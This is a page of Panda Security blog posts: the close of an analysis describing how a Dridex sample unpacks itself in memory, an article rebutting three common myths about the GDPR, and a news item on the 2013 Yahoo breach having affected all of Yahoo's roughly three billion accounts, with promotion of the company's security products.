Finally, the shellcode decrypts the executable found in the DATA section in the computer’s memory, copies it into the base image’s address, and then runs the new resulting executable.

Figure 7. Decrypted executable

In summary, the full unpacking process of the sample is shown schematically in Figure 8.

Figure 8. Complete unpacking process

Make sure to use advanced cybersecurity solutions like Adaptive Defense 360 that monitor the organization’s systems in real time, detecting and stopping any suspicious behavior that could be harmful to your business.

For more information, download the full report:

The post Dridex, the Latest Version of the Credential Theft Malware appeared first on Panda Security Mediacenter.


Debunking the Myths of the GDPR

The GDPR (General Data Protection Regulation) is a hot topic among experts in cybersecurity and privacy. For consumers, the GDPR will strengthen the protection of basic rights on the internet and give control of personal data back to the user. But what does this mean for companies?

As the date for its entry into force approaches, and having explained the most important changes the regulation will bring about, in this article we will have a look at some of the myths surrounding the GDPR.

Myth 1: “The GDPR only affects companies in the European Union”

This is far from being the truth. The GDPR rules will apply to all companies that offer goods or services to people from the EU, regardless of where their offices or servers are located. Therefore, the GDPR applies to all companies that process information from EU citizens, making this the first global data protection law. For example, if an EU citizen uses a US-based social network, makes an ecommerce transaction in Japan, or uses an Argentinian platform for vacation rentals, all those companies must comply with the GDPR.

Myth 2: “All security incidents must be reported within 72 hours”

This is one of the most widespread myths and has been accepted as a general rule, but there is some nuance to it. First, only personal data leaks need to be reported — it is not required in the case of security incidents or data breaches that do not involve personal data. This means that any breach that affects the confidentiality or integrity of personal information must be reported.

Moreover, the countdown for the 72 hour deadline does not start when the incident occurs, but rather when the company becomes aware that it has suffered a personal data breach. If for some reason it is not possible to report the breach to the authorities within this time period, the limit can be extended provided that the organization justifies the delay.

Myth 3: “All data must be encrypted in order to be in compliance with the GDPR”

This is false for several reasons. The GDPR requires that measures be implemented to provide an appropriate level of security, based on an assessment of the risk involved in any action that requires, for example, the processing or storage of personal data.

Although encryption is a recommended measure, it is not a must. Everything depends on the risks associated with not encrypting said personal data. Thus, in the case of sensitive data, such as patient medical information, the GDPR recommends encryption and other robust security measures, such as secure algorithms.

Panda Security Can Help Ease the Transition

These are just three of the myths shrouding a regulation that will mark a before and after in the protection of personal data. To help all types of companies adapt and comply with the GDPR, at Panda we have prepared the “Preparation Guide to the New European General Data Protection Regulation”. In this guide, we respond to major issues related to the GDPR: How does it affect my business? What obligations does this regulation bring about? What happens if I do not comply with these obligations?

With this whitepaper, and using tools included in our Adaptive Defense solution, Panda can help meet the requirements imposed by the new regulation. Although the law will not come into effect until 2018, it is vital to understand the implications of the GDPR and to implement a plan of action.

The post Debunking the Myths of the GDPR appeared first on Panda Security Mediacenter.


All Yahoo Accounts Compromised in the 2013 Yahoo Data Breach

Recently Oath, the owner of Yahoo and a subsidiary of Verizon, revealed that the biggest known cyber data breach ever recorded in the history of humankind was larger than Yahoo initially announced. As you may remember, in 2013 Yahoo suffered a cyber-attack in which approximately one billion accounts were affected. Even though it took Yahoo more than two full years to release the information about the data breach to the public, further investigation by the current owners confirmed that the incident was on a much larger scale. A few days ago, the current owners of Yahoo distributed a notice stating that every single Yahoo account might have been compromised during this very same attack. The total number of user accounts that Yahoo had at the time was around three billion.

The news is a significant blow for Verizon, as they might have been able to negotiate a better deal when acquiring Yahoo had they known that the cyber-attack had affected every customer, instead of the initially announced one-third of the accounts. In the notice released earlier today, Chandra McMahon, Chief Information Security Officer at Verizon, said:

“Verizon is committed to the highest standards of accountability and transparency, and we proactively work to ensure the safety and security of our users and networks in an evolving landscape of online threats. Our investment in Yahoo is allowing that team to continue to take significant steps to enhance their security, as well as benefit from Verizon’s experience and resources.”

The good news is that this is not a new security issue: Yahoo and Verizon claim that they have done everything possible to secure the accounts of their current users.

Yahoo is currently sending email notifications to the additional affected user accounts. The forensic experts hired by Verizon highlighted the fact that the compromised data is not known to contain cleartext passwords, nor any banking information such as credit card numbers and bank account details. However, the investigation is still considered ongoing.

If you are worried that you may be among those affected, and you did not take any precautions when the breach was initially reported, check out our top 5 things you should do immediately.

The post All Yahoo Accounts Compromised in the 2013 Yahoo Data Breach appeared first on Panda Security Mediacenter.


Software and Security Information